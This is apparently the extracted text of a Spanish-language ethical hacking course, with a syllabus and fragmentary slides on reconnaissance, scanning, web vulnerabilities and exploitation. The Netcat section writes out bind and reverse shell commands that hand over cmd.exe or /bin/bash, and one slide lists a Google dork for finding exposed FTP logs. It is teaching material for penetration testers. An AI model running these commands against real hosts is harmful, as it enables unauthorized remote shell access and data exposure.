Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Ethical Hacking Cibertec PDF
Ethical Hacking Cibertec PDF
Ethical Hacking
40 Horas
Todos los nombres propios de programas,
sistemas operativos, equipos hardware,
etc., que aparecen en este manual son
marcas registradas de sus respectivas
compañías u organizaciones.
Ethical Hacking
SYLLABUS
I. DESCRIPCIÓN
Con el crecimiento exponencial de la Internet y su infraestructura, cada vez son más las
organizaciones que apuestan por Internet como un medio, para brindar servicios a sus
clientes y guardar su información. En estos tiempos, la información es un activo primordial
para la organización y su modelo de negocio.
El Ethical Hacking es el proceso por el cual, se utilizan las mismas técnicas y herramientas
de un atacante malicioso para atacar a una organización de una manera controlada; esta
filosofía resulta de la práctica probada: "para atrapar a un ladrón debes pensar como un
ladrón". El objetivo del Ethical Hacking es brindar ayuda a las organizaciones para que
tomen todas las medidas preventivas en contra de agresiones maliciosas, valiéndose para
ello, de los tests de intrusión, los cuales evalúan la seguridad técnica de los sistemas de
información, redes de datos, aplicaciones web, servidores expuestos, etc.
Pre-requisitos:
Conocimientos intermedios de redes
Conocimientos básicos de programación
Identificar y describir cómo operan los “hackers” cuando atacan servidores y clientes,
a través de Internet.
Realizar una prueba de penetración.
Utilizar en forma práctica, las herramientas que se utilizan en un proceso de Ethical
Hacking.
Explicar la metodología OSSTMM desarrollada por ISECOM, para realizar tests de
seguridad.
Describir cómo funcionan los ataques más comunes que ocurren en Internet y por
consiguiente, cómo protegerse de ellos.
Explicar las ventajas del uso de la tecnología y los peligros que se pueden generar si
no se tiene implementada una cultura de seguridad.
1
III. METODOLOGÍA
La metodología será expositiva y práctica; apoyada con laboratorios que han sido
diseñados para complementar y afianzar el aprendizaje del curso. Los manuales y
diapositivas han sido desarrollados a la medida, y se utilizarán mediante los medios
multimedia, implementados en las aulas. A cada alumno se le asignará una computadora
con el software necesario.
Recursos:
Una computadora personal
Syllabus del curso
Material Educativo del curso
IV. EVALUACIÓN
2
V. CONTENIDO ANALITICO
Conceptos Básicos
Historia de los Hackers
Tipos de Ethical Hacking
Etapas del Ethical Hacking
Metodologías de Evaluación
Laboratorio No. 1:
Cuestionario de Preguntas
Discusión en clase
Introducción
Consola de Linux
Sistema de Archivos
Instalación de Software
Laboratorio No. 2:
Instalación de software utilizando consola
Compilando código C
Interpretando scripts perl, python, bash
Laboratorio No. 3:
Capturando paquetes en la red con Wireshark
Envenenamiento ARP con Etterpcap y arpspoof
3
CAPÍTULO No. 4: Reconocimiento del Objetivo Duración: 4 hrs.
Introducción
Google Hacking
Interrogación DNS
Herramientas
Laboratorio No. 4:
Buscando información sensible con Google.
Herramientas host, dig, whois, SamSpade
Introducción
Escaneo de Puertos y Enumeración de Servicios
Nmap
Laboratorio No. 5:
Uso de herramientas de scanning.
RETO: Elevando privilegios en un servidor local.
Introducción
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicación
Laboratorio No. 6:
Reconociendo vulnerabilidades a nivel plataforma con Nessus,NeXpose
Análisis de Vulnerabilidades a nivel aplicación.
Introducción
Vulnerabiliaddes Web
Frameworks de Aprendizaje
Laboratorio No. 7:
Explotando vulnerabilidades Web (RFI, SQLi, LFI)
Atacame (Reto)
4
CAPÍTULO No. 8: Explotación de Vulnerabilidades Duración: 4 hrs.
Laboratorio No. 8:
Explotando vulnerabilidades con Metasploit
Consiguiendo una shell con Netcat
Libros:
Penetration Testing And Network Defense. (2005). Cisco Press. United States of
America
Penetration Tester's Open Source Toolkit. (2007). Syngress. United States of America
The Web Application Hackers Handbook (2009). Wiley Publishing. United States of
America
Hacking Exposed 6th Edition. (2009). McGraw-Hill. United States of America
Google Hacking For Penetration Testers. (2005). Syngress. United States of America
Material Técnico de Open-Sec.(2009) Perú
5
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Conceptos básicos
Historia de los Hackers
Tipos de Evaluación
Etapas del Ethical Hacking
Metodología de Evaluación
1
División de Alta Tecnología
Ethical Hacking
2
División de Alta Tecnología
Ethical Hacking
Manipulación de Gusanos en
Paquetes / Spoofing Internet
Alto Análisis “Ocultos”
DDoS
Sweepers Sofisticación de las
Back Doors
Sniffers herramientas de los
Explotación de O-day exploits
atacantes
vulnerabilidades
conocidas Deshabilitar
Programas auditorías
auto
replicados
Password Cracking
Conocimiento
técnico
Adivinar requerido
Passwords
3
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Conceptos básicos
Historia de los Hackers
Tipos de Evaluación
Etapas del Ethical Hacking
Metodología de Evaluación
4
División de Alta Tecnología
Ethical Hacking
a) PDP-1
b) MIT
c) Tech Model Railroad Club
d) ARPANET
a) Laboratorios Bell
b) Multics
c) C
d) USENET
e) Free Software Foundation
f) Linus Torvalds
5
División de Alta Tecnología
Ethical Hacking
a) Kevin Mitnick
b) Adrian Lamo
c) Tsutomu Shimomura
a) Hackers
b) Crackers
c) Lamers
d) Newbie
e) Phreakers
f) Cyber-Terrorist
6
División de Alta Tecnología
Ethical Hacking
a) Trazabilidad
b) Autenticidad
c) Activo
d) Amenaza
e) Vulnerabilidad
f) Riesgo
g) Ataque
7
División de Alta Tecnología
Ethical Hacking
Seguridad de la Información
Protege la información de un amplio espectro de amenazas, a efectos de
asegurar la continuidad y minimizar los daños a la empresa
maximizando el retorno de inversión.
Seguridad Informática
Asegura los recursos del sistema de información (material informático o
programas) de la empresa para ser utilizados de la manera en que se
decidió.
8
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Conceptos básicos
Historia de los Hackers
Tipos de Evaluación
Etapas del Ethical Hacking
Metodología de Evaluación
9
División de Alta Tecnología
Ethical Hacking
WHITEBOX BLACKBOX
GRAYBOX
10
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Conceptos básicos
Historia de los Hackers
Tipos de Evaluación
Etapas del Ethical Hacking
Metodología de Evaluación
a) Reconocimiento
b) Scanning
c) Conseguir Acceso
d) Mantener Acceso
e) Borrar Huellas
11
División de Alta Tecnología
Ethical Hacking
2
1
4
5
3
Contenido de Agenda
Conceptos básicos
Historia de los Hackers
Tipos de Evaluación
Etapas del Ethical Hacking
Metodología de Evaluación
12
División de Alta Tecnología
Ethical Hacking
a) Seguridad de la Información
b) Seguridad de los Procesos
c) Seguridad en las Tecnologías de Internet
d) Seguridad en las Comunicaciones
e) Seguridad Inalámbrica
f) Seguridad Física
13
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 1
Ejercicio 1:
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones
Tiempo Estimado: 15 minutos
14
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Consola de Linux
Sistema de Archivos
Instalación del Software
1
División de Alta Tecnología
Ethical Hacking
PROGRAMAS DE APLICACIÓN
SISTEMA OPERATIVO
HARDWARE
2
División de Alta Tecnología
Ethical Hacking
GNU Linux
a) Poderoso y versátil S.O. de licencia libre
b) Núcleo (Linus Torvalds) combinado con sistema GNU
c) Desarrollo de la comunidad
1.4. Distribuciones
a) Ubuntu
b) RedHat
c) Fedora
d) Debian
e) Suse Enterprise
f) OpenSuse
g) Gentoo
3
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Consola de Linux
Sistema de Archivos
Instalación del Software
2.1. Antecedentes
4
División de Alta Tecnología
Ethical Hacking
2.1. Antecedentes
5
División de Alta Tecnología
Ethical Hacking
a) Useradd
b) Userdel
c) Passwd
d) Groups
e) Groupadd
Ejemplo:
a) IFCONFIG eth0 192.168.1.30 netmask 255.255.255.0
b) ROUTE ADD DEFAULT gw 192.168.1.1
c) VI /ETC/RESOLV.CONF
d) NAMESERVER 8.8.8.8
6
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Consola de Linux
Sistema de Archivos
Instalación del Software
7
División de Alta Tecnología
Ethical Hacking
8
División de Alta Tecnología
Ethical Hacking
9
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Consola de Linux
Sistema de Archivos
Instalación del Software
4.1. Introducción
10
División de Alta Tecnología
Ethical Hacking
b) CD fuente
c) ./CONFIGURE
d) MAKE
11
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 2
Ejercicio:
Tiempo: 30 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá, obtener valiosas conclusiones
12
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
1
División de Alta Tecnología
Ethical Hacking
Un protocolo puede ser visto como un lenguaje que utilizan las computadoras
para comunicarse e intercambiar información entre sí. Los protocolos
permiten que equipos con diferentes arquitecturas o sistemas operativos se
enlacen.
2
División de Alta Tecnología
Ethical Hacking
3
División de Alta Tecnología
Ethical Hacking
4
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
5
División de Alta Tecnología
Ethical Hacking
2.1. Definición
2.2. Wireshark
6
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
a) Un switch es un equipo de
conectividad que trabaja en la capa
de enlace similar a un concentrador.
7
División de Alta Tecnología
Ethical Hacking
8
División de Alta Tecnología
Ethical Hacking
9
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
4.1. Introducción
Un ataque de denegación de
servicio, también llamado DoS
(Denial of Service) es un ataque a
un sistema de computadoras o red,
que causa que un servicio o recurso
sea inaccesible a los usuarios
legítimos.
10
División de Alta Tecnología
Ethical Hacking
11
División de Alta Tecnología
Ethical Hacking
Syn Flood
ICMP Flood
12
División de Alta Tecnología
Ethical Hacking
SMURF
TEARDROP
13
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
5.1. Definición
14
División de Alta Tecnología
Ethical Hacking
a) Troyano
b) Virus
c) Bomba Lógica
d) Botnet
e) Gusano
f) Keylogger
g) Stealer
h) Rootkit
i) Adware
j) Spyware
k) Backdoor
15
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 3
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá, obtener valiosas conclusiones
16
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Google Hacking
Interrogación DNS
Herramientas
1
División de Alta Tecnología
Ethical Hacking
1.1. Antecedentes
1.1. Antecedentes
2
División de Alta Tecnología
Ethical Hacking
a) Nombres de dominio
b) Direcciones IP
c) Información de registro (IP, Dominio)
d) Rangos de red
e) Proveedor de Internet
f) Tecnologías utilizadas
g) Arquitectura de Red
h) Información relevante
Contenido de Agenda
Introducción
Google Hacking
Interrogación DNS
Herramientas
3
División de Alta Tecnología
Ethical Hacking
4
División de Alta Tecnología
Ethical Hacking
b) Logs de aplicaciones
ws_ftp filetype:log access
filetype:log
Contenido de Agenda
Introducción
Google Hacking
Interrogación DNS
Herramientas
5
División de Alta Tecnología
Ethical Hacking
6
División de Alta Tecnología
Ethical Hacking
Consola
a) Whois
b) Dig.
c) Host
Web
a) RIR
b) Netcraft (www.netcraft.com)
c) Clez (www.clez.net)
Contenido de Agenda
Introducción
Google Hacking
Interrogación DNS
Herramientas
7
División de Alta Tecnología
Ethical Hacking
4.1. Introducción
8
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 4
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.
9
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Escaneo y Enumeración
Nmap
1
División de Alta Tecnología
Ethical Hacking
1.1. Antecedentes
Contenido de Agenda
Introducción
Escaneo y Enumeración
Nmap
2
División de Alta Tecnología
Ethical Hacking
Dirección IP
Puerto
3
División de Alta Tecnología
Ethical Hacking
Socket
Socket
4
División de Alta Tecnología
Ethical Hacking
Conexión TCP
Ping Sweep
5
División de Alta Tecnología
Ethical Hacking
TCP Connect
SYN Scan
6
División de Alta Tecnología
Ethical Hacking
SYN Scan
NULL Scan
Este escaneo se basa en enviar un paquete malformado con todos los flags
TCP desactivados y esperar la respuesta. Según el RFC 793, si un sistema
recibe un paquete hacia un puerto cerrado TCP, sin ningún flag activo,
deberá responder con un RST.
7
División de Alta Tecnología
Ethical Hacking
XMAS Scan
FIN Scan
8
División de Alta Tecnología
Ethical Hacking
UPD Scan
9
División de Alta Tecnología
Ethical Hacking
10
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Escaneo y Enumeración
Nmap
11
División de Alta Tecnología
Ethical Hacking
3.1. Definición
12
División de Alta Tecnología
Ethical Hacking
a) paranoid (0)
Evasión IDS, serializado, 5 minutos de gap
b) sneaky (1)
15 segundos de gap
c) polite (2)
0.4 segundos de gap
d) normal (3)
verificaciones en paralelo
e) aggressive (4)
10 milisegundos de gap
f) insane (5)
5 milisegundos de gap
13
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 5
Ejercicio:
Tiempo: 90 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.
14
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicación
1
División de Alta Tecnología
Ethical Hacking
2
División de Alta Tecnología
Ethical Hacking
3
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicación
4
División de Alta Tecnología
Ethical Hacking
5
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicación
6
División de Alta Tecnología
Ethical Hacking
7
División de Alta Tecnología
Ethical Hacking
Laboratorio nº 6
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.
8
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Vulnerabilidades Web
Frameworks de Aprendizaje
1
División de Alta Tecnología
Ethical Hacking
2
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Vulnerabilidades Web
Frameworks de Aprendizaje
2.1. Antecedentes
3
División de Alta Tecnología
Ethical Hacking
2.1. Antecedentes
2.1. Antecedentes
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
4
División de Alta Tecnología
Ethical Hacking
Inyección SQL
Inyección SQL
5
División de Alta Tecnología
Ethical Hacking
http://www.xssed.org/
6
División de Alta Tecnología
Ethical Hacking
7
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
Introducción
Vulnerabilidades Web
Frameworks de Aprendizaje
3.1. WebGoat
8
División de Alta Tecnología
Ethical Hacking
Permite entrenamiento en seguridad Web en SQL Injection, XSS (Cross Site Scripting), LFI
(Local File Inclusion), RFI (Remote File Inclusion), Command Execution, Upload Script y Login
Brute Force.
Laboratorio nº 7
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.
9
oidiiddhufhahfofhjfhajos
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
1
División de Alta Tecnología
Ethical Hacking
1.1. Introducción
1.2. Securityfocus.com
2
División de Alta Tecnología
Ethical Hacking
1.3. Exploit-db.com
1.4. Packetstormsecurity.org
3
División de Alta Tecnología
Ethical Hacking
extensión: .pl
Extensión: .c, .cc perl exploit.pl parámetros
gcc exploit.c -o binario
./binario parámetros
Extensión: .php
php exploit.php parámetros
Extensión: .py
python exploit.py parámetros
Extensión: .rb
ruby exploit.rb parámetros
Contenido de Agenda
4
División de Alta Tecnología
Ethical Hacking
2.1. Introducción
5
División de Alta Tecnología
Ethical Hacking
6
División de Alta Tecnología
Ethical Hacking
Contenido de Agenda
3.1. Introducción
7
División de Alta Tecnología
Ethical Hacking
8
División de Alta Tecnología
Ethical Hacking
Máquina A:
a) Windows: nc -lvvp 4444 -e cmd.exe
b) Linux: nc -lvvp 444 -e /bin/bash
Máquina B:
a) nc -v 192.168.1.1 4444
9
División de Alta Tecnología
Ethical Hacking
Máquina B:
a) nc -lvvp 4444
Máquina A:
a) Windows: nc -v 192.168.1.1
4444 -e cmd.exe
b) Linux: nc -v 192.168.1.1 4444 -
e /bin/bash
Contenido de Agenda
10
División de Alta Tecnología
Ethical Hacking
4.1. Introducción
Password
Ataque
Guessing Password Sniffing
Híbrido
11
División de Alta Tecnología
Ethical Hacking
4.3. Herramientas
Cain &
Abel
Laboratorio nº 8
Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compañeros, lo que le permitirá obtener valiosas conclusiones.
12